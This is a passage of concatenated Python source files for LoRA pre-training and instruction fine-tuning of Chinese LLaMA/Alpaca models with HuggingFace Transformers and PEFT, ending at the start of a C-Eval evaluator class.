len(features)) elif isinstance(v, np.ndarray): batch[k] = torch.tensor(np.stack([features[0][k]] * len(features))) else: batch[k] = torch.tensor([features[0][k]] * len(features)) return batch MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) tokenizer_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The tokenizer for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_dir: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." ) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[float] = field( default=0.05, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"}) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") @dataclass class MyTrainingArguments(TrainingArguments): trainable : Optional[str] = field(default="q_proj,v_proj") lora_rank : Optional[int] = field(default=8) lora_dropout : Optional[float] = field(default=0.1) lora_alpha : Optional[float] = field(default=32.) modules_to_save : Optional[str] = field(default=None) debug_mode : Optional[bool] = field(default=False) peft_path : Optional[str] = field(default=None) logger = logging.getLogger(__name__) def main(): parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN, handlers=[logging.StreamHandler(sys.stdout)],) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # transformers.tokenization_utils.logging.set_verbosity_warning() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.tokenizer_name_or_path: tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) # Preprocessing the datasets. # First we tokenize all the texts. # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer(examples["text"]) # clm input could be much much longer than block_size if "Token indices sequence length is longer than the" in cl.out: tok_logger.warning( "^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits" " before being passed to the model." ) return output if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 1024: logger.warning( "The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value" " of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can" " override this default with `--block_size xxx`." ) block_size = 1024 else: if data_args.block_size > tokenizer.model_max_length: logger.warning( f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model" f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}." ) block_size = min(data_args.block_size, tokenizer.model_max_length) # Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size. def group_texts(examples): # Concatenate all texts. concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()} total_length = len(concatenated_examples[list(examples.keys())[0]]) # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can # customize this part to your needs. if total_length >= block_size: total_length = (total_length // block_size) * block_size # Split by chunks of max_len. result = { k: [t[i : i + block_size] for i in range(0, total_length, block_size)] for k, t in concatenated_examples.items() } result["labels"] = result["input_ids"].copy() return result with training_args.main_process_first(desc="dataset map tokenization and grouping"): lm_datasets = [] path = Path(data_args.dataset_dir) files = [file.name for file in path.glob("*.txt")] if training_args.debug_mode is True: files = [files[0]] for idx, file in enumerate(files): data_file = os.path.join(path, file) filename = ''.join(file.split(".")[:-1]) cache_path = os.path.join(data_args.data_cache_dir, filename) os.makedirs(cache_path, exist_ok=True) try: processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False) logger.info(f'training datasets-{filename} has been loaded from disk') except Exception: cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text") os.makedirs(cache_dir, exist_ok=True) raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False) logger.info(f"{file} has been loaded") tokenized_dataset = raw_dataset.map( tokenize_function, batched=True, num_proc=data_args.preprocessing_num_workers, remove_columns="text", load_from_cache_file=True, keep_in_memory=False, cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset}, desc="Running tokenizer on dataset", ) grouped_datasets = tokenized_dataset.map( group_texts, batched=True, num_proc=data_args.preprocessing_num_workers, load_from_cache_file=True, keep_in_memory=False, cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset}, desc=f"Grouping texts in chunks of {block_size}", ) processed_dataset = grouped_datasets processed_dataset.save_to_disk(cache_path) if idx == 0: lm_datasets = processed_dataset['train'] else: assert lm_datasets.features.type == processed_dataset["train"].features.type lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]]) lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage) if training_args.do_train: train_dataset = lm_datasets['train'] if data_args.max_train_samples is not None: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) logger.info(f"Num train_samples {len(train_dataset)}") logger.info("training example:") logger.info(tokenizer.decode(train_dataset[0]['input_ids'])) if training_args.do_eval: eval_dataset = lm_datasets["test"] if data_args.max_eval_samples is not None: max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) logger.info(f"Num eval_samples {len(eval_dataset)}") logger.info("training example:") logger.info(tokenizer.decode(eval_dataset[0]['input_ids'])) if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) model = LlamaForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, low_cpu_mem_usage=True ) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") model_vocab_size = model.get_output_embeddings().weight.size(0) if not ( (model_vocab_size==32000 and len(tokenizer)==49953) or \ (model_vocab_size==32000 and len(tokenizer)==32000) or \ (model_vocab_size==49953 and len(tokenizer)==49953) or \ (model_vocab_size==49954 and len(tokenizer)==49954) ): raise ValueError( f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n" "Valid configurations (base model / tokenizer):\n" "- Continue pre-training original LLaMA: 32000 / 32000 \n" "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n" "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n" "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n") model.resize_token_embeddings(len(tokenizer)) if training_args.peft_path is not None: logger.info("Peft from pre-trained model") model = PeftModel.from_pretrained(model, training_args.peft_path) else: logger.info("Init new peft model") target_modules = training_args.trainable.split(',') modules_to_save = training_args.modules_to_save if modules_to_save is not None: modules_to_save = modules_to_save.split(',') lora_rank = training_args.lora_rank lora_dropout = training_args.lora_dropout lora_alpha = training_args.lora_alpha logger.info(f"target_modules: {target_modules}") logger.info(f"lora_rank: {lora_rank}") peft_config = LoraConfig( task_type=TaskType.CAUSAL_LM, target_modules=target_modules, inference_mode=False, r=lora_rank, lora_alpha=lora_alpha, lora_dropout=lora_dropout, modules_to_save=modules_to_save) model = get_peft_model(model, peft_config) model.print_trainable_parameters() old_state_dict = model.state_dict model.state_dict = ( lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict()) ).__get__(model, type(model)) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, data_collator=fault_tolerance_data_collator, compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available() else None, ) trainer.add_callback(SavePeftModelCallback) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint train_result = trainer.train(resume_from_checkpoint=checkpoint) metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) if __name__ == "__main__": main() File: scripts/training/build_dataset.py import logging import os from dataclasses import dataclass from typing import Dict, Sequence, Union, List import datasets import torch from datasets import load_dataset, concatenate_datasets import transformers IGNORE_INDEX = -100 logger = logging.getLogger('__name__') PROMPT_TEMPLATE = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n{instruction}\n\n### Response: " ) def build_instruction_dataset(data_path: Union[List[str],str], tokenizer: transformers.PreTrainedTokenizer, max_seq_length: int, data_cache_dir = None, preprocessing_num_workers = None, ): def tokenization(examples): sources = [] targets = [] prompt = PROMPT_TEMPLATE for instruction, input, output in zip(examples['instruction'],examples['input'],examples['output']): if input is not None and input !="": instruction = instruction+'\n'+input source = prompt.format_map({'instruction':instruction}) target = f"{output}{tokenizer.eos_token}" sources.append(source) targets.append(target) tokenized_sources = tokenizer(sources,return_attention_mask=False) tokenized_targets = tokenizer(targets,return_attention_mask=False,add_special_tokens=False) all_input_ids = [] all_labels = [] for s,t in zip(tokenized_sources['input_ids'],tokenized_targets['input_ids']): input_ids = torch.LongTensor(s + t)[:max_seq_length] labels = torch.LongTensor([IGNORE_INDEX] * len(s) + t)[:max_seq_length] assert len(input_ids) == len(labels) all_input_ids.append(input_ids) all_labels.append(labels) results = {'input_ids':all_input_ids, 'labels': all_labels} return results logging.warning("building dataset...") all_datasets = [] if not isinstance(data_path,(list,tuple)): data_path = [data_path] for file in data_path: if data_cache_dir is None: data_cache_dir = str(os.path.dirname(file)) cache_path = os.path.join(data_cache_dir,os.path.basename(file).split('.')[0]) os.makedirs(cache_path, exist_ok=True) try: processed_dataset = datasets.load_from_disk(cache_path) logger.info(f'training datasets-{file} has been loaded from disk') except Exception: raw_dataset = load_dataset("json", data_files=file, cache_dir=cache_path) tokenization_func = tokenization tokenized_dataset = raw_dataset.map( tokenization_func, batched=True, num_proc=preprocessing_num_workers, remove_columns=["instruction","input","output"], keep_in_memory=False, desc="preprocessing on dataset", ) processed_dataset = tokenized_dataset processed_dataset.save_to_disk(cache_path) processed_dataset.set_format('torch') all_datasets.append(processed_dataset['train']) all_datasets = concatenate_datasets(all_datasets) return all_datasets @dataclass class DataCollatorForSupervisedDataset(object): """Collate examples for supervised fine-tuning.""" tokenizer: transformers.PreTrainedTokenizer def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]: input_ids, labels = tuple([instance[key] for instance in instances] for key in ("input_ids", "labels")) input_ids = torch.nn.utils.rnn.pad_sequence( input_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id ) labels = torch.nn.utils.rnn.pad_sequence(labels, batch_first=True, padding_value=-100) return dict( input_ids=input_ids, labels=labels, attention_mask=input_ids.ne(self.tokenizer.pad_token_id), ) File: scripts/training/run_clm_sft_with_peft.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import math import os import sys from dataclasses import dataclass, field from typing import Optional from pathlib import Path import datasets import torch from build_dataset import build_instruction_dataset, DataCollatorForSupervisedDataset import transformers from transformers import ( CONFIG_MAPPING, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM, LlamaTokenizer, AutoTokenizer, HfArgumentParser, Trainer, TrainingArguments, set_seed, ) from transformers.trainer_utils import get_last_checkpoint from transformers.utils import send_example_telemetry from transformers.utils.versions import require_version from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR IGNORE_INDEX = -100 DEFAULT_PAD_TOKEN = "[PAD]" DEFAULT_EOS_TOKEN = "</s>" DEFAULT_BOS_TOKEN = "<s>" DEFAULT_UNK_TOKEN = "<unk>" require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") class SavePeftModelCallback(transformers.TrainerCallback): def save_model(self, args, state, kwargs): if state.best_model_checkpoint is not None: checkpoint_folder = os.path.join(state.best_model_checkpoint, "sft_lora_model") else: checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}") peft_model_path = os.path.join(checkpoint_folder, "sft_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) def on_save(self, args, state, control, **kwargs): self.save_model(args, state, kwargs) return control def on_train_end(self, args, state, control, **kwargs): peft_model_path = os.path.join(args.output_dir, "sft_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) tokenizer_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The tokenizer for weights initialization.Don't set if you want to train a model from scratch." ) }, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_dir: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[float] = field( default=0.05, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) data_cache_dir: Optional[str] = field(default=None, metadata={"help": "The datasets processed stored"}) max_seq_length: Optional[int] = field(default=512) @dataclass class MyTrainingArguments(TrainingArguments): trainable : Optional[str] = field(default="q_proj,v_proj") lora_rank : Optional[int] = field(default=8) lora_dropout : Optional[float] = field(default=0.1) lora_alpha : Optional[float] = field(default=32.) modules_to_save : Optional[str] = field(default=None) peft_path : Optional[str] = field(default=None) force_resize_embeddings: bool = field(default=False) logger = logging.getLogger(__name__) def main(): parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN, handlers=[logging.StreamHandler(sys.stdout)],) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # transformers.tokenization_utils.logging.set_verbosity_warning() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.tokenizer_name_or_path: tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) if (len(tokenizer))!=49954: raise ValueError(f"The vocab size of the tokenizer must be 49954, but found {len(tokenizer)}.\n" "Please use Chinese Alpaca tokenizer!") if tokenizer.pad_token is None: print(f"Adding pad token {DEFAULT_PAD_TOKEN}") tokenizer.add_special_tokens(dict(pad_token=DEFAULT_PAD_TOKEN)) data_collator = DataCollatorForSupervisedDataset(tokenizer=tokenizer) eval_dataset=None train_dataset = None if training_args.do_train: with training_args.main_process_first(desc="loading and tokenization"): path = Path(data_args.dataset_dir) files = [os.path.join(path,file.name) for file in path.glob("*.json")] logger.info(f"Training files: {' '.join(files)}") train_dataset = build_instruction_dataset( data_path=files, tokenizer=tokenizer, max_seq_length=data_args.max_seq_length, data_cache_dir = None, preprocessing_num_workers = data_args.preprocessing_num_workers) logger.info(f"Num train_samples {len(train_dataset)}") logger.info("training example:") logger.info(tokenizer.decode(train_dataset[0]['input_ids'])) if training_args.do_eval: with training_args.main_process_first(desc="loading and tokenization"): files = [data_args.validation_file] logger.info(f"Evaluation files: {' '.join(files)}") eval_dataset = build_instruction_dataset( data_path=files, tokenizer=tokenizer, max_seq_length=data_args.max_seq_length, data_cache_dir = None, preprocessing_num_workers = data_args.preprocessing_num_workers) logger.info(f"Num eval_samples {len(eval_dataset)}") logger.info("eval example:") logger.info(tokenizer.decode(eval_dataset[0]['input_ids'])) if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) model = LlamaForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, low_cpu_mem_usage=True ) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") logger.info(f"len(tokenizer):{len(tokenizer)}") embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) != embedding_size: logger.info("resize the embedding size by the size of the tokenizer") model.resize_token_embeddings(len(tokenizer)) if training_args.peft_path is not None: logger.info("Peft from pre-trained model") model = PeftModel.from_pretrained(model, training_args.peft_path) else: logger.info("Init new peft model") target_modules = training_args.trainable.split(',') modules_to_save = training_args.modules_to_save if modules_to_save is not None: modules_to_save = modules_to_save.split(',') lora_rank = training_args.lora_rank lora_dropout = training_args.lora_dropout lora_alpha = training_args.lora_alpha logger.info(f"target_modules: {target_modules}") logger.info(f"lora_rank: {lora_rank}") peft_config = LoraConfig( task_type=TaskType.CAUSAL_LM, target_modules=target_modules, inference_mode=False, r=lora_rank, lora_alpha=lora_alpha, lora_dropout=lora_dropout, modules_to_save=modules_to_save) model = get_peft_model(model, peft_config) #model.base_model.tie_weights() model.print_trainable_parameters() logger.info(f"model.modules_to_save: {model.modules_to_save}") old_state_dict = model.state_dict model.state_dict = ( lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict()) ).__get__(model, type(model)) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset, eval_dataset=eval_dataset, tokenizer=tokenizer, data_collator=data_collator, ) trainer.add_callback(SavePeftModelCallback) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint train_result = trainer.train(resume_from_checkpoint=checkpoint) metrics = train_result.metrics metrics["train_samples"] = len(train_dataset) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() metrics["eval_samples"] =len(eval_dataset) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) if __name__ == "__main__": main() File: scripts/ceval/llama_evaluator.py # This code is modified from C-Eval Project: https://github.com/SJTU-LIT/ceval import os import re from tqdm import tqdm import random import numpy as np import torch from transformers import LlamaForCausalLM, LlamaTokenizer from evaluator import Evaluator class Llama_Evaluator(Evaluator): def __init__(self, choices, k, model_path, device, temperature=0.2): super(Llama_Evaluator, self).__init__(choices, model_path, k) load_type = torch.float16 self.model_path = model_path self.device = device self.tokenizer = 